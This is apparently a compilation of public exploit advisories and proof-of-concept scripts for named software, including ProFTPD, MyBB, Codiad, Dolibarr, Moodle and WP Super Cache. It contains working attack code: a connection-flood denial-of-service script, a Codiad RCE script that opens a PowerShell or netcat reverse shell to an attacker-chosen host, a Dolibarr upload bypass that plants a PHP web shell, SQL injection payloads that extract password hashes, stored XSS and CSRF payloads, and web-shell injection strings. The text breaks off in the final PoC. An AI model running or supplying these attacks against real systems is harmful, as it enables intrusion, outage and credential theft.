# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service # Date: 22/03/2021 # Exploit Author: xynmaps # Vendor Homepage: http://www.proftpd.org/ # Software Link: https://github.com/proftpd/proftpd # Version: 1.3.7a # Tested on: Parrot Security OS 5.9.0 #-------------------------------# #encoding=utf8 #__author__ = XYN/Dump/NSKB3 #ProFTPD Denial of Service exploit by XYN/Dump/NSKB3. """ ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server, you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited. (if it's limited, just run this script from different proxies using proxychains, and it will work) """ import socket import sys import threading import subprocess import time banner = """ ._________________. | ProFTPD | | D o S | |_________________| |By XYN/DUMP/NSKB3| |_|_____________|_| |_|_|_|_____|_|_|_| |_|_|_|_|_|_|_|_|_| """ usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0]) def test(t,p): s = socket.socket() s.settimeout(10) try: s.connect((t, p)) response = s.recv(65535) s.close() return 0 except socket.error: print("Port {} is not open, please specify a port that is open.".format(p)) sys.exit() def attack(targ, po, id): try: subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #print("Worker {} running".format(id)) except OSError: pass def main(): global target, port, start print banner try: target = sys.argv[1] except: print usage sys.exit() try: port = int(sys.argv[2]) except: port = 21 try: conns = int(sys.argv[3]) except: conns = 50 print("[!] Testing if {0}:{1} is open".format(target, port)) test(target, port) print("[+] Port {} open, starting attack...".format(port)) time.sleep(2) print("[+] Attack started on {0}:{1}!".format(target, port)) def loop(target, port, conns): global start threading.Thread(target=timer).start() while 1: for i in range(1, conns + 3): t = threading.Thread(target=attack, args=(target,port,i,)) t.start() if i > conns + 2: t.join() break loop() t = threading.Thread(target=loop, args=(target, port, conns,)) t.start() def timer(): start = time.time() while 1: if start < time.time() + float(900): pass else: subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) t = threading.Thread(target=loop, args=(target, port,)) t.start() break main()

# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path # Exploit Auth: Tech Johnny # Vendor Homepage: https://www.osas.com # Version: 11 x86 # Tested on: Windows 2012R2 Details: C:\Windows\system32>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto C:\Windows\system32>sc.exe qc travextensionhostsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: travextensionhostsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TRAVERSE Automation Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection # Exploit Author: SivertPL ([email protected]) # Date: 20.03.2021 # Description: Lack of sanitization in the "votes[]" parameter in "Edit Poll" causes a second-order semi-blind SQL Injection that is triggered when performing a "Move/Copy" operation on the thread. # Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip # CVE: CVE-2021-27946 References: 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums 2) https://vuldb.com/?id.171307 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch In order to trigger the vulnerability, you must have permission to edit polls. Moderators and administrators can usually do it, but in some configurations regular users can do it as well. In case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash. Otherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary injections automatically, and send the resulting hashes to your server. This is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of a very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector. This vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used. In such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash). Guide: 1) Make a thread with a public poll, with multiple choices. 2) Vote on at least one choice. 3) Go to the "Edit poll" section of the poll. 4) Place the following payload in the "vote count" input (any entry within the votes[] parameter in the resulting POST request). 1','2',ascii((select version())),'0','0','1','1') -- -a 5) Save the poll. 6) Perform a "Move/Copy" operation on the thread, moving it to a different forum, or making a copy in the same forum. This is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect. 7) Go to the copied/moved version of the thread (you should be redirected there automatically). 8) Go to the "Show Results" section of the poll. 9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. Since this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()). Other parameters in the INSERT query that we are injecting into are either too small, or unfeasible. Unsigned integer provides enough space to extract required data when enough requests are made. In this case, the number is the ASCII code of the first character of the result of the injected select version() query. This way we can transfer the output through this covert channel, one character at a time. In order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int. 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 2, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 3, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 4, 1))),'0','0','1','1') -- -a 1','2',ascii((substring((SELECT password FROM mybb_users WHERE username="sivertpl"), 5, 1))),'0','0','1','1') -- -a ... etc. This will send the ASCII codes of every char of the hashed password through the integer covert channel. 10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.

# Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS # Exploit Author: Jitendra Kumar Tripathi # Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html # Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code # Version: 1 # Tested on Windows 10 + Xampp 8.0.3 XSS IMPACT: 1: Steal the cookie 2: User redirection to a malicious website Vulnerable Parameters: Customer Details *Steps to reproduce:* 1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side. 2: Add the new customer and then add the payload <script>alert(document.cookie)</script>in Customer Name parameter and click on save button. Post Saved successfully. 3: Now, XSS will get stored and trigger every time when you click view customer and the attacker can steal authenticated users' cookies.

# Exploit Title: Hi-Rez Studios 5.1.6.3 - 'HiPatchService' Unquoted Service Path # Dicovery by: Ekrem Can Kök # Discovery Date: 2021-03-22 # Vendor Homepage: https://www.hirezstudios.com # Version: 5.1.6.3 # Tested on: Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\" | findstr /i "HiPatchService" | findstr /i /v """ Hi-Rez Studios Authenticate and Update Service HiPatchService C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe Auto # Service info: C:\>sc qc "HiPatchService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HiPatchService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Hi-Rez Studios Authenticate and Update Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-22 # Vendor : ELAN Microelectronics # Version : ELAN Touchpad 15.2.13.1_X64_WHQL # Vendor Homepage : http://www.emc.com.tw/ # Tested on OS: Windows 8 #This software installs EDTService.exe, version 11.10.2.1 #Analyze PoC : ============== C:\>sc qc ETDService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ETDService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Elan Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path # Exploit Author : SamAlucard # Exploit Date: 2021-03-21 # Software Version : ActivIdentity 8.2 # Vendor Homepage : https://www.hidglobal.com/ # Tested on OS: Windows 7 Pro # ActivIdentity was Acquired by HID Global in Octuber 2010 #ActivClient is a desktop authentication software that uses smarts cards and readers # for enterprise, government and commercial establishments #Analyze PoC : ============== C:\Users\DSAdsi>sc qc ac.sharedstore [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ac.sharedstore TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe GRUPO_ORDEN_CARGA : SmartCardGroup ETIQUETA : 0 NOMBRE_MOSTRAR : ActivIdentity Shared Store Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) # Discovery by: WangYihang # Vendor Homepage: http://codiad.com/ # Software Links : https://github.com/Codiad/Codiad/releases # Tested Version: Version: 2.8.4 # CVE: CVE-2018-14009 #!/usr/bin/env python # encoding: utf-8 import requests import sys import json import base64 session = requests.Session() def login(domain, username, password): global session url = domain + "/components/user/controller.php?action=authenticate" data = { "username": username, "password": password, "theme": "default", "language": "en" } response = session.post(url, data=data, verify=False) content = response.text print("[+] Login Content : %s" % (content)) if 'status":"success"' in content: return True def get_write_able_path(domain): global session url = domain + "/components/project/controller.php?action=get_current" response = session.get(url, verify=False) content = response.text print("[+] Path Content : %s" % (content)) json_obj = json.loads(content) if json_obj['status'] == "success": return json_obj['data']['path'] else: return False def base64_encode_2_bytes(host, port): payload = ''' $client = New-Object System.Net.Sockets.TCPClient("__HOST__",__PORT__); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close(); ''' result = "" for i in payload.replace("__HOST__", host).replace("__PORT__", str(port)): result += i + "\x00" return base64.b64encode(result.encode()).decode().replace("\n", "") def build_powershell_payload(host, port): preffix = "powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc " return preffix + base64_encode_2_bytes(host, port).replace("+", "%2b") def exploit(domain, username, password, host, port, path, platform): global session url = domain + \ "components/filemanager/controller.php?type=1&action=search&path=%s" % ( path) if platform.lower().startswith("win"): # new version escapeshellarg # escapeshellarg on windows will quote the arg with "" # so we need to try twice payload = '||%s||' % (build_powershell_payload(host, port)) payload = "search_string=Hacker&search_file_type=" + payload headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=payload, headers=headers, verify=False) content = response.text print(content) # old version escapeshellarg payload = '%%22||%s||' % (build_powershell_payload(host, port)) payload = "search_string=Hacker&search_file_type=" + payload headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=payload, headers=headers, verify=False) content = response.text print(content) else: # payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F''' + host + '''%2F''' + port + '''+0%3E%261'%0Agrep+%22SniperOJ''' payload = '"%%0Anc %s %d|/bin/bash %%23' % (host, port) payload = "search_string=Hacker&search_file_type=" + payload headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=payload, headers=headers, verify=False) content = response.text print(content) def promote_yes(hint): print(hint) while True: ans = input("[Y/n] ").lower() if ans == 'n': return False elif ans == 'y': return True else: print("Incorrect input") def main(): if len(sys.argv) != 7: print("Usage : ") print(" python %s [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0])) print(" python %s [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]" % (sys.argv[0])) print("Example : ") print(" python %s http://localhost/ admin admin 8.8.8.8 8888 linux" % (sys.argv[0])) print(" python %s http://localhost:8080/ admin admin 8.8.8.8 8888 windows" % (sys.argv[0])) print("Author : ") print(" WangYihang <[email protected]>") exit(1) domain = sys.argv[1] username = sys.argv[2] password = sys.argv[3] host = sys.argv[4] port = int(sys.argv[5]) platform = sys.argv[6] if platform.lower().startswith("win"): print("[+] Please execute the following command on your vps: ") print("nc -lnvp %d" % (port)) if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"): exit(1) else: print("[+] Please execute the following command on your vps: ") print("echo 'bash -c \"bash -i >/dev/tcp/%s/%d 0>&1 2>&1\"' | nc -lnvp %d" % (host, port + 1, port)) print("nc -lnvp %d" % (port + 1)) if not promote_yes("[+] Please confirm that you have done the two command above [y/n]"): exit(1) print("[+] Starting...") if not login(domain, username, password): print("[-] Login failed! Please check your username and password.") exit(2) print("[+] Login success!") print("[+] Getting writeable path...") path = get_write_able_path(domain) if path == False: print("[+] Get current path error!") exit(3) print("[+] Writeable Path : %s" % (path)) print("[+] Sending payload...") exploit(domain, username, password, host, port, path, platform) print("[+] Exploit finished!") print("[+] Enjoy your reverse shell!") if __name__ == "__main__": main()

# Exploit Title: Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path # Discovery by: Alan Mondragon # Discovery Date: 2021-03-23 # Vendor Homepage: https://eventlogxp.com/ # Software Links : https://eventlogxp.com/ # Tested Version: Version: 4.9.3 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Elodea Event Collector Service ElodeaEventCollectorService C:\Program Files (x86)\Elodea\EventCollector.exe Auto C:\WINDOWS\system32>sc qc "ElodeaEventCollectorService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ElodeaEventCollectorService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Elodea\EventCollector.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Elodea Event Collector Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path # Date: 2021-1-19 # Exploit Author: Mohammed Alshehri # Software Link: https://sourceforge.net/projects/ext2fsd/files/latest/download # Version: 0.68 # Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc Ext2Srv [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Ext2Srv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Ext2Fsd\Ext2Srv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Ext2 Management Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.

# Exploit Title: Linksys EA7500 2.0.8.194281 - Cross-Site Scripting # Date: 3/24/21 # Exploit Author: MiningOmerta # Vendor Homepage: https://www.linksys.com/ # Version: EA7500 Firmware Version: 2.0.8.194281 # CVE: CVE-2012-6708 # Tested On: Linksys EA7500 (jQuery version 1.7.1) # Cross-Site Scripting Vulnerability on modern versions of Linksys Smart-Wifi home routers. # Caused by outdated jQuery(strInput) version : <= 1.7.1 (Fixed in version 1.9.0) # Credit also to Reddit user michael1026 ### POC ### 1. When logging into the router (http://LHOST or http://LHOST:10080), choose "Click Here" next to "Dont Have an Account? " or Choose "click here" after "To login with your Linksys Smart Wi-Fi account", you will be redirected with a login prompt with both Email Address and Password forms. 2. Make your email address "<img src=0 onerror=alert(XSS)>" without the double quotes. 3. Payload will be triggered when mouse is clicked anywhere within the Email Address form box or when form is submitted.

# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated) # Exploit Author: Felipe Prates Donato (m4ud) # Vendor Homepage: http://www.ovidentia.org # Version: 6 # DORK : "Powered by Ovidentia" http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--

# Exploit Title: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting # Date: 03/25/2020 # Exploit Author: Jithin KS # Vendor Homepage: https://www.gxgroup.eu/ont-products/ # Version: Platinum-4410 Software version - P4410-V2-1.31A # Tested on: Windows 10 # Author Contact: hhttps://twitter.com/jithinks_8<https://twitter.com/amalmohandas0> Vulnerability Details ====================== Genexis Platinum-4410 Home Gateway Unit is vulnerable to stored XSS in the "start_addr" parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users. How to reproduce =================== 1. Login to the firmware as any user 2. Navigate to Manage tab--> Security Management 3. Enter any valid value in Start Source Address and fill all other fields. Click Add. 4. Capture this request in Burp Suite. Enter payload <script>alert(1)</script> in "start_addr" text box and forward the request. 5. Relogin as any user and again navigate to Manage tab--> Security Management 6. Observe the XSS popup showing persistent XSS

# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) # Date: 16/06/2020 # Exploit Author: Andrea Gonzalez # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://github.com/Dolibarr/dolibarr # Version: Prior to 11.0.5 # Tested on: Debian 9.12 # CVE : CVE-2020-14209 #!/usr/bin/python3 # Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested. import re import sys import random import string import argparse import requests import urllib.parse from urllib.parse import urlparse session = requests.Session() base_url = "http://127.0.0.1/htdocs/" documents_url = "http://127.0.0.1/documents/" proxies = {} user_id = -1 class bcolors: BOLD = '\033[1m' HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' def printc(s, color): print(f"{color}{s}{bcolors.ENDC}") def read_args(): parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). If no method is chosen, every method is tested.') parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.') parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).') parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").') parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.') parser.add_argument('--extension-bypass', dest='fbypass', action='store_true', default=False, help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.') parser.add_argument('--file-renaming', dest='frenaming', action='store_true', default=False, help='A PHP script is uploaded and .php extension is added using file renaming function.') parser.add_argument('--htaccess', dest='htaccess', action='store_true', default=False, help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.') required = parser.add_argument_group('required named arguments') required.add_argument('-u', '--user', help='Username', required=True) required.add_argument('-p', '--password', help='Password', required=True) return parser.parse_args() def error(s, end=False): printc(s, bcolors.HEADER) if end: sys.exit(1) """ Returns user id """ def login(user, password): data = { "actionlogin": "login", "loginfunction": "loginfunction", "username": user, "password": password } login_url = urllib.parse.urljoin(base_url, "index.php") r = session.post(login_url, data=data, proxies=proxies) try: regex = re.compile(r"user/card.php\?id=(\d+)") match = regex.search(r.text) return int(match.group(1)) except Exception as e: #error(e) return -1 def upload(filename, payload): files = { "userfile": (filename, payload), } data = { "sendit": "Send file" } headers = { "Referer": base_url } upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies) def delete(filename): data = { "action": "confirm_deletefile", "confirm": "yes", "urlfile": filename } headers = { "Referer": base_url } delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) session.post(delete_url, headers=headers, data=data, proxies=proxies) def rename(filename, new_filename): data = { "action": "renamefile", "modulepart": "user", "renamefilefrom": filename, "renamefileto": new_filename, "renamefilesave": "Save" } headers = { "Referer": base_url } rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) session.post(rename_url, headers=headers, data=data, proxies=proxies) def test_payload(filename, payload, query, headers={}): file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query)) r = session.get(file_url, headers=headers, proxies=proxies) if r.status_code != 200: error("Error %d %s" % (r.status_code, file_url)) elif payload in r.text: error("Non-executable %s" % file_url) else: printc("Payload was successful! %s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN) return True return False def get_random_filename(): return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)) def upload_executable_file_php(payload, query): php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"] random_filename = get_random_filename() b = False for extension in php_extensions: filename = random_filename + extension upload(filename, payload) if test_payload(filename, payload, query): b = True return b def upload_executable_file_ssi(payload, command): filename = get_random_filename() + ".shtml" upload(filename, payload) return test_payload(filename, payload, '', headers={'ACCEPT': command}) def upload_and_rename_file(payload, query): filename = get_random_filename() + ".php" upload(filename, payload) rename(filename + ".noexe", filename) return test_payload(filename, payload, query) def upload_htaccess(payload, query): filename = get_random_filename() + ".noexe" upload(filename, payload) filename_ht = get_random_filename() + ".htaccess" upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n") delete(".htaccess") rename(filename_ht, ".htaccess") return test_payload(filename, payload, query) if __name__ == "__main__": args = read_args() base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/' documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/") documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/' user = args.user password = args.password payload = "<?php system($_GET['cmd']) ?>" payload_ssi = '<!--#exec cmd="$HTTP_ACCEPT" -->' command = args.cmd query = "cmd=%s" % command if args.proxy: proxies = {"http": args.proxy, "https": args.proxy} user_id = login(user, password) if user_id < 0: error("Login error", True) printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN) print('-' * 30) if not args.fbypass and not args.frenaming and not args.htaccess: args.fbypass = args.frenaming = args.htaccess = True if args.fbypass: printc("Trying extension-bypass method\n", bcolors.BOLD) b = upload_executable_file_php(payload, query) b = upload_executable_file_ssi(payload_ssi, command) or b if b: printc("\nextension-bypass was successful", bcolors.OKBLUE) else: printc("\nextension-bypass was not successful", bcolors.WARNING) print('-' * 30) if args.frenaming: printc("Trying file-renaming method\n", bcolors.BOLD) if upload_and_rename_file(payload, query): printc("\nfile-renaming was successful", bcolors.OKBLUE) else: printc("\nfile-renaming was not successful", bcolors.WARNING) print('-' * 30) if args.htaccess: printc("Trying htaccess method\n", bcolors.BOLD) if upload_htaccess(payload, query): printc("\nhtaccess was successful", bcolors.OKBLUE) else: printc("\nhtaccess was not successful", bcolors.WARNING) print('-' * 30)

# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting # Exploit Author: George Tsimpidas # Date: 2021-03-25 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip # Version : 1.0.0 # Tested on: Kali Linux 2020.4 # Category: Webapp # Description Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category #PoC 1. Login as admin : http://localhost/regis_inventory/index.php 2. Visit : http://localhost/regis_inventory/item.php 3. Click add a New Item and input your payload on "Generic Name" textbox. Payload : <script>alert("XSS")</script> 4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up

# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery # Exploit Author: Abhishek Joshi # Date: March 25, 2021 # Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download # Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip # Version: 0.1 # Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10 # Tested against: Firefox 78.7.0esr (64-bit) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site. ## CSRF POST Form Method <html><body> <form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST"> <input type="hidden" name="customjs_url_content" value=""> <input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')"> <input type="hidden" name="submit" value="Save Settings"> <input type="submit" value="Submit request"> </form> </body></html>

# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting # Date: 25.03.2021 # Author: Vincent666 ibn Winnie # Software Link: https://moodle.org/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month Choose a role : Student (example) Open calendar : https://school.localhost/calendar/view.php?view=month Create new event: Example: Event Title "Test" Description :Choose Insert Video File and choose Video: Video Source Url you can paste video link from youtube And open Subtitles and Captions: Subtitle track URL use video link from youtube Field Label : There is we can use xss code: <img src="1" onerror="alert(1)" /> or try in base64 <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed> Insert Media and save this. Open event and get stored xss. POST: https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form Host: school.localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 996 Origin: https://school.localhost Connection: keep-alive Referer: https://school.localhost/calendar/view.php?view=month Cookie: MoodleSession=4ea0036558425526decc096ed375b886; EU_COOKIE_LAW_CONSENT=true [{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]

# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated) # Google Dork: inurl:/wp-content/plugins/wp-super-cache/ # Date: 2021-03-13 # Exploit Author: m0ze # Version: <= 1.7.1 # Software Link: https://wordpress.org/plugins/wp-super-cache/ ### -- [ Info: ] [i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress. [i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection. [i] Another possible attack vector: from XSS to RCE. ### -- [ Impact: ] [~] Full compromise of the vulnerable web application and also web server. ### -- [ Payloads: ] [$] ';system($_GET[13]);include_once \'wp-cache-config.php\';' [$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!-- [$] ';`$_GET[13]`;# ### -- [ PoC #1 | Authenticated RCE | Cache Location: ] [!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1 Host: example.com 